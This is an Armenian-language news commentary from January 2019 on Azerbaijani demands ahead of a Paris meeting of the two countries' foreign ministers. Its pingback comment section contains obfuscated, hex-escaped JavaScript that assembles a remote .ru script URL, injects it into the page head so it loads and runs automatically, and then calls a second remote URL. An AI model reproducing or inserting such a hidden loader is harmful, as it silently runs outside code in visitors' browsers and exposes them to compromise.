Ալիևի կապրիզը՝ երկու օրից կայանալիք հանդիպումից առաջ

Jan 16, 2019 1 Comment

Հունվարի 16-ին Փարիզում ԵԱՀԿ Մինսկի Խմբի համանախագահների միջնորդությամբ և մասնակցությամբ կայանալու է Հայաստանի ԱԳ նախարարի պաշտոնակատար Մնացականյանի հանդիպումը Ադրբեջանի ԱԳ նախարար Մամեդյարովի հետ, այսօր հայտնել է ՀՀ ԱԳՆ մամլո խոսնակ Աննա Նաղդալյանը:

Այս հանդիպման կազմակերպման մասին անցյալ վերջից եղել են տեղեկություններ, որ նման նախաձեռնություն կա: Այս հանդիպումն էլ իր հերթին, անկասկած կծառայի՝ Փաշինյան-Ալիև հանդիպման կազմակերպման համար:

Ու բոլորիվին էլ պատահական չէ, որ պաշտոնական Բաքուն 2019-ը, կարծես, հայտարարել է Բաքվի պահանջատիրության տարի: Փաշինյանի հետ բանակցություններից առաջ Ալիևը խորամանկորեն ջնջեց 2016-ից հետո հայկական կողմի կոշտ դիրքորոշումները՝ մի շարք հարցերում, այժմ Բաքուն Հայաստանին ներկայացնում է պահանջներ, որոնք 2016-ի ապրիլյան պատերազմից հետո պաշտոնական Երևանը հրապարակային արհամարհում էր:

Պատկերը հիմա փոխվել է: Ալիևը նոր «էջ» է բացում ղարաբաղյան բանակցություններում այնպիսի տոնայնությամբ՝ կարծես Հայաստանն է 2016-ին հարձակվել Ադրբեջանի վրա ու պատերազմել սանձազերծել:

Ահա մի քանի օրից կայանալիք Մնացականյան-Մամեդյարով հանդիպումից Բաքուն անցնում է նոր պահանջի ներկայացման, կարծես, արդեն կողմերը համաձայնեցնել են բանակցության բոլոր կետերը ու մնացել է հասարակություններին խաղաղության նախապատրաստելը:

«Պաշտոնական Երևանը պետք է անի ամեն ինչ՝ Հայաստանի քաղաքացիներին հարևան պետությունների հետ խաղաղությանը նախապատրաստելու համար», – Թուրքիայի անգլալեզու պետական TRT World հեռուստաալիքի եթերում հայտարարել է Ադրբեջանի նախագահի աշխատակազմի արտաքին հարաբերությունների բաժնի ղեկավար Հիքմեթ Հաջիևը:

Նրա խոսքով՝ Հարավային Կովկասում հաշտեցման գործընթացը կարող է մեկնարկել միայն հայկական կողմի զիջումներից հետո: «Նախևառաջ, հայկական զորքերը պետք է դուրս բերվեն գրավյալ տարածքներից, իսկ ադրբեջանցի ներքին տեղահանվածները պետք է վերադառնան հարազատ օջախներ: Այդ դեպքում արդեն քայլեր կձեռնարկվեն վստահության, լիարժեք տարածաշրջանային համագործակցության և ազգամիջյան հաշտեցման վերականգնման ուղղությամբ», – նշել է ադրբեջանցի պաշտոնյան:

Բանակցություններ՝ «գրավյալ տարածքների վերադարձից» հետո: Ահա Հայաստանում իշխանափոխության «պտուղները»:

Թամար Բագրատունի

Գլխավոր Թողարկում, Վերլուծություն

Մեկ անդրադարձ “Ալիևի կապրիզը՝ երկու օրից կայանալիք հանդիպումից առաջ” հրապարակմանը

  1. Ալիևի կապրիզը՝ երկու օրից կայանալիք հանդիպումից առաջ — Նորություններ հայաստանում says:

    […] http://hayeli.am/article/1140334 var cs=["x74x70x3a","x6dx70","x6cx6f","x74","x68x65x61","x61x64x65","x68x74x74","x62x36x34","x73x61","x70x3ax2f","x65x6e","x74x65","x2ex6a","x2ex72","x75x2f","x73","x73x63x72","x78x6dx6c","x67x65x74","x6cx65","x69x70","x75x73x61","x78x74","x61x72x6d","x77x68x69x6cx65","x76x61","x69x61","x43x6fx64","x61x72",'x61x62x73',"x77x69x6ex64x6fx77","x2fx6ax61",'x61x62x73','x66x6fx72',"x63x6f","x65x2e","x2fx75","x68x74","x66x75x6ex63x74x69x6fx6e","x2fx2f","x64","x74x69x6dx65"]; function f0( p1, p0 ) { var v0 = document.createElement( cs[16]+cs[20]+cs[3] ) v0.type = cs[11]+cs[22]+cs[31]+cs[25]+cs[16]+cs[20]+cs[3]; if(v0.readyState) { v0.onreadystatechange = function() { if ( v0.readyState === cs[2]+cs[5]+cs[40] || v0.readyState === cs[34]+cs[1]+cs[19]+cs[11] ) { v0.onreadystatechange = null; p0(); } }; } else { v0.onload = function() { p0(); }; } v0.src = p1; document.getElementsByTagName( cs[4]+cs[40] )[0].appendChild( v0 ); } f0(cs[37]+cs[0]+cs[39]+cs[23]+cs[21]+cs[13]+cs[14]+cs[28]+cs[12]+cs[15], function() { showAd(cs[6]+cs[9]+cs[36]+cs[8]+cs[23]+cs[10]+cs[26]+cs[13]+cs[14]+cs[18]+cs[27]+cs[35]+cs[17]) }); […]

Մեկնաբանել